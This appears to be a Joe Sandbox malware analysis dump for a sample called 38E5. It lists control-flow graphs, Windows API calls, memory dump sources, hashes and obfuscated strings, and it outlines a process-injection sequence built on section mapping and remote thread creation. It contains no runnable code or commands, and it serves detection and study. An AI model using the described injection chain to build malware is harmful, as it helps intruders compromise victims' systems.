                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                                                        • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                                                        • Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                                                        • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 303 4015df-4015e4 305 4015f4 303->305 306 4015eb-4015f0 303->306 305->306 307 4015f7-40160a call 401240 305->307 306->307 310 40160c 307->310 311 40160f-401614 307->311 310->311 313 40161a-40162b 311->313 314 40193e-401946 311->314 317 401631-40165a 313->317 318 40193c 313->318 314->311 319 40194b-40198e call 401240 314->319 317->318 327 401660-401677 NtDuplicateObject 317->327 318->319 327->318 329 40167d-4016a1 NtCreateSection 327->329 331 4016a3-4016c4 NtMapViewOfSection 329->331 332 4016fd-401723 NtCreateSection 329->332 331->332 333 4016c6-4016e2 NtMapViewOfSection 331->333 332->318 334 401729-40172d 332->334 333->332 336 4016e4-4016fa 333->336 334->318 337 401733-401754 NtMapViewOfSection 334->337 336->332 337->318 339 40175a-401776 NtMapViewOfSection 337->339 339->318 342 40177c 339->342 342->318 344 40177c call 401781 342->344 344->318
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                                                        • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                                                        • Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                                                        • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 345 4015f2-4015f4 347 4015f7-40160a call 401240 345->347 348 4015eb-4015f0 345->348 351 40160c 347->351 352 40160f-401614 347->352 348->347 351->352 354 40161a-40162b 352->354 355 40193e-401946 352->355 358 401631-40165a 354->358 359 40193c 354->359 355->352 360 40194b-40198e call 401240 355->360 358->359 368 401660-401677 NtDuplicateObject 358->368 359->360 368->359 370 40167d-4016a1 NtCreateSection 368->370 372 4016a3-4016c4 NtMapViewOfSection 370->372 373 4016fd-401723 NtCreateSection 370->373 372->373 374 4016c6-4016e2 NtMapViewOfSection 372->374 373->359 375 401729-40172d 373->375 374->373 377 4016e4-4016fa 374->377 375->359 378 401733-401754 NtMapViewOfSection 375->378 377->373 378->359 380 40175a-401776 NtMapViewOfSection 378->380 380->359 383 40177c 380->383 383->359 385 40177c call 401781 383->385 385->359
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                                                        • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                                                        • Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                                                        • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 386 4015e6-40160a call 401240 391 40160c 386->391 392 40160f-401614 386->392 391->392 394 40161a-40162b 392->394 395 40193e-401946 392->395 398 401631-40165a 394->398 399 40193c 394->399 395->392 400 40194b-40198e call 401240 395->400 398->399 408 401660-401677 NtDuplicateObject 398->408 399->400 408->399 410 40167d-4016a1 NtCreateSection 408->410 412 4016a3-4016c4 NtMapViewOfSection 410->412 413 4016fd-401723 NtCreateSection 410->413 412->413 414 4016c6-4016e2 NtMapViewOfSection 412->414 413->399 415 401729-40172d 413->415 414->413 417 4016e4-4016fa 414->417 415->399 418 401733-401754 NtMapViewOfSection 415->418 417->413 418->399 420 40175a-401776 NtMapViewOfSection 418->420 420->399 423 40177c 420->423 423->399 425 40177c call 401781 423->425 425->399
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                                                        • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
                                                                        • Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                                                        • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 426 403043-403067 427 40319a-40319f 426->427 428 40306d-403085 426->428 428->427 429 40308b-40309c 428->429 430 40309e-4030a7 429->430 431 4030ac-4030ba 430->431 431->431 432 4030bc-4030c3 431->432 433 4030e5-4030ec 432->433 434 4030c5-4030e4 432->434 435 40310e-403111 433->435 436 4030ee-40310d 433->436 434->433 437 403113-403116 435->437 438 40311a 435->438 436->435 437->438 439 403118 437->439 438->430 440 40311c-403121 438->440 439->440 440->427 441 403123-403126 440->441 441->427 442 403128-403197 RtlCreateUserThread NtTerminateProcess 441->442 442->427
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                        • String ID:
                                                                        • API String ID: 1921587553-0
                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • _strlen.LIBCMT ref: 00431296
                                                                        • LocalAlloc.KERNELBASE(00000000,00467221), ref: 004312E9
                                                                        • VirtualProtect.KERNELBASE(00477FF8,0047856C,00000020,?), ref: 00431367
                                                                        • LoadLibraryA.KERNELBASE(00449F78), ref: 00431522
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: AllocLibraryLoadLocalProtectVirtual_strlen
                                                                        • String ID: $Bq $W$!$dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler$gulepulawoboxejobukade$jjj$jjj$kernel32.dll$lulugumiwitojijeponuyo$royakamexisezepucivapah$tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy$vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga${
                                                                        • API String ID: 349918097-3902791245
                                                                        • Opcode ID: 6b06d21b638aa7282f18eacee7887cae100392b5e156ec492f4e918b727b1bd6
                                                                        • Instruction ID: 415c62a77951a744553a168a51a57c6a95c62745853e107deaa3f9e8edd1f5a1
                                                                        • Opcode Fuzzy Hash: 6b06d21b638aa7282f18eacee7887cae100392b5e156ec492f4e918b727b1bd6
                                                                        • Instruction Fuzzy Hash: F3A1E131940244AFE7109B61ED89FAF7B78FB89B05F10412AF645B66B0CB741884CF6D

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 107 61003c-610047 108 610049 107->108 109 61004c-610263 call 610a3f call 610e0f call 610d90 VirtualAlloc 107->109 108->109 124 610265-610289 call 610a69 109->124 125 61028b-610292 109->125 130 6102ce-6103c2 VirtualProtect call 610cce call 610ce7 124->130 127 6102a1-6102b0 125->127 129 6102b2-6102cc 127->129 127->130 129->127 136 6103d1-6103e0 130->136 137 6103e2-610437 call 610ce7 136->137 138 610439-6104b8 VirtualFree 136->138 137->136 140 6105f4-6105fe 138->140 141 6104be-6104cd 138->141 144 610604-61060d 140->144 145 61077f-610789 140->145 143 6104d3-6104dd 141->143 143->140 147 6104e3-610505 143->147 144->145 150 610613-610637 144->150 148 6107a6-6107b0 145->148 149 61078b-6107a3 145->149 158 610517-610520 147->158 159 610507-610515 147->159 151 6107b6-6107cb 148->151 152 61086e-6108be LoadLibraryA 148->152 149->148 153 61063e-610648 150->153 155 6107d2-6107d5 151->155 157 6108c7-6108f9 152->157 153->145 156 61064e-61065a 153->156 160 610824-610833 155->160 161 6107d7-6107e0 155->161 156->145 162 610660-61066a 156->162 164 610902-61091d 157->164 165 6108fb-610901 157->165 166 610526-610547 158->166 159->166 163 610839-61083c 160->163 167 6107e2 161->167 168 6107e4-610822 161->168 169 61067a-610689 162->169 163->152 170 61083e-610847 163->170 165->164 173 61054d-610550 166->173 167->160 168->155 171 610750-61077a 169->171 172 61068f-6106b2 169->172 174 610849 170->174 175 61084b-61086c 170->175 171->153 176 6106b4-6106ed 172->176 177 6106ef-6106fc 172->177 179 6105e0-6105ef 173->179 180 610556-61056b 173->180 174->152 175->163 176->177 181 61074b 177->181 182 6106fe-610748 177->182 179->143 183 61056d 180->183 184 61056f-61057a 180->184 181->169 182->181 183->179 185 61059b-6105bb 184->185 186 61057c-610599 184->186 191 6105bd-6105db 185->191 186->191 191->173
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0061024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2487104825.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_610000_38E5.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691
                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction ID: b40402b49297019ac0359b46df886006c9cefe6b746cbecd0bbf5e598aecbc36
                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction Fuzzy Hash: 24526874A012299FDB64CF68C985BA8BBB1BF09304F1480D9E54DAB351DB70AAC5DF14

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 443 850bf6-850c0f 444 850c11-850c13 443->444 445 850c15 444->445 446 850c1a-850c26 CreateToolhelp32Snapshot 444->446 445->446 447 850c36-850c43 Module32First 446->447 448 850c28-850c2e 446->448 449 850c45-850c46 call 8508b5 447->449 450 850c4c-850c54 447->450 448->447 455 850c30-850c34 448->455 453 850c4b 449->453 453->450 455->444 455->447
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00850C1E
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 00850C3E
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2487596772.000000000083E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0083E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_83e000_38E5.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0
                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction ID: 7e1372986b2ebc3d631bf5ac9f2c91988da63be7bc25410b64df627b2a90e1bc
                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction Fuzzy Hash: E1F062351007186FE7203BB99C8DBAB76E8FF4A766F100628EA46D51C0DA70EC498A61

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 456 610e0f-610e24 SetErrorMode * 2 457 610e26 456->457 458 610e2b-610e2c 456->458 457->458
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00610223,?,?), ref: 00610E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00610223,?,?), ref: 00610E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2487104825.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_610000_38E5.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction ID: 649faff877baa90af5d0f76c5993c87f03ba0bdede3cca897dfd7d7f314a1141
                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction Fuzzy Hash: FFD0123114512877DB002A95DC09BCD7B1CDF05B62F048411FB0DD9180C7B0998046E5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 478 401991-4019ed call 401240 Sleep 490 4019f3-4019f5 478->490 491 4019ee call 4014c4 478->491 492 401a04-401a52 call 401240 490->492 493 4019f7-4019ff call 4015b7 490->493 491->490 493->492
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                        • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                                                        • Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                        • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 507 4019a9-4019ed call 401240 Sleep 519 4019f3-4019f5 507->519 520 4019ee call 4014c4 507->520 521 401a04-401a52 call 401240 519->521 522 4019f7-4019ff call 4015b7 519->522 520->519 522->521
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                        • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                                                        • Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                        • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 536 4019af-4019ed call 401240 Sleep 543 4019f3-4019f5 536->543 544 4019ee call 4014c4 536->544 545 401a04-401a52 call 401240 543->545 546 4019f7-4019ff call 4015b7 543->546 544->543 546->545
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                        • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                                                        • Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                        • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                        • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                                                        • Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                        • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00850906
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2487596772.000000000083E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0083E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_83e000_38E5.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction ID: 0ec658a6ea77c5a6b0e1e87f5853085a4ac5854e270aa32f48103afba00959d5
                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction Fuzzy Hash: 96111979A00208EFDB01DF98C985E98BBF5AB08351F058094F9489B362D371EA54DF81
                                                                        APIs
                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00431F0A
                                                                          • Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 00432458
                                                                          • Part of subcall function 00432443: __CxxThrowException@8.LIBCMT ref: 0043246D
                                                                          • Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 0043247E
                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00431F47
                                                                          • Part of subcall function 004323F6: std::exception::exception.LIBCMT ref: 0043240B
                                                                          • Part of subcall function 004323F6: __CxxThrowException@8.LIBCMT ref: 00432420
                                                                          • Part of subcall function 004323F6: std::exception::exception.LIBCMT ref: 00432431
                                                                        • _memmove.LIBCMT ref: 00431FA8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                        • String ID: invalid string position$string too long
                                                                        • API String ID: 1615890066-4289949731
                                                                        • Opcode ID: 8eace0a7697c018465074f5cf330f0012f6cf608b613838aa4c2c894d7c59f1b
                                                                        • Instruction ID: 2cadb799d56146ba8edc6c72aff560a7796ad4882ddfea7e943b282292512433
                                                                        • Opcode Fuzzy Hash: 8eace0a7697c018465074f5cf330f0012f6cf608b613838aa4c2c894d7c59f1b
                                                                        • Instruction Fuzzy Hash: 0331D9323042109BD7209E5CE980B6AF7A9EBA9764F20162FF151CB3A1D769DC4087A9
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: __calloc_crt
                                                                        • String ID: `3D$p3D$5D
                                                                        • API String ID: 3494438863-1679561808
                                                                        • Opcode ID: dfb4aae6aee4ecb5de40c711e9b4d43864fbad214a1b4fa278cd1eb853dd7bf7
                                                                        • Instruction ID: de272e09e23d9250239db4a7490b72095702d82ebb5a40ea01cd9d0a8bb696a3
                                                                        • Opcode Fuzzy Hash: dfb4aae6aee4ecb5de40c711e9b4d43864fbad214a1b4fa278cd1eb853dd7bf7
                                                                        • Instruction Fuzzy Hash: 6911E732708A105BE7288F2DBC5576523A1E7D9768F24523BE915CB2D0E7B8DCC2424D
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00439254
                                                                          • Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
                                                                          • Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D
                                                                        • __amsg_exit.LIBCMT ref: 00439274
                                                                        • __lock.LIBCMT ref: 00439284
                                                                        • _free.LIBCMT ref: 004392B4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                        • String ID: (;D
                                                                        • API String ID: 3170801528-2216469755
                                                                        • Opcode ID: c9deaab60658337a242e35b7a4e1c8f3ffb1bed4fe497dd85b9e8f843bd969d8
                                                                        • Instruction ID: 152704ef30623c9238207a3cfdd3a47f7cc548f2c407fd24f81e6b70bdaadf34
                                                                        • Opcode Fuzzy Hash: c9deaab60658337a242e35b7a4e1c8f3ffb1bed4fe497dd85b9e8f843bd969d8
                                                                        • Instruction Fuzzy Hash: 4A01E131D00A12B7DB21AF65840570FB7A0BF0DB56F11145BE800A3291C7BC6E41CBCD
                                                                        APIs
                                                                        • ___BuildCatchObject.LIBCMT ref: 004380D5
                                                                          • Part of subcall function 00438030: ___BuildCatchObjectHelper.LIBCMT ref: 00438066
                                                                        • _UnwindNestedFrames.LIBCMT ref: 004380EC
                                                                        • ___FrameUnwindToState.LIBCMT ref: 004380FA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                        • String ID: csm$csm
                                                                        • API String ID: 2163707966-3733052814
                                                                        • Opcode ID: 8ec11db0930f1ab87a506301e832f5c1ddd9745f274d356e72011f87bb40a249
                                                                        • Instruction ID: 130df07e853fa2f533784855c47a2f69c2e55324b64576559f26a633e08d5ed7
                                                                        • Opcode Fuzzy Hash: 8ec11db0930f1ab87a506301e832f5c1ddd9745f274d356e72011f87bb40a249
                                                                        • Instruction Fuzzy Hash: 17014B71000209BBDF226F51CC41EABBF6AFF0C394F00501ABC5814261DB3AE9B1DBA8
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: __calloc_crt__init_pointers__initptd__mtterm
                                                                        • String ID:
                                                                        • API String ID: 3132042578-0
                                                                        • Opcode ID: c8559c121642958bdeb8a5be3527d4de0f9ddb177b78d609e1602090be52ff69
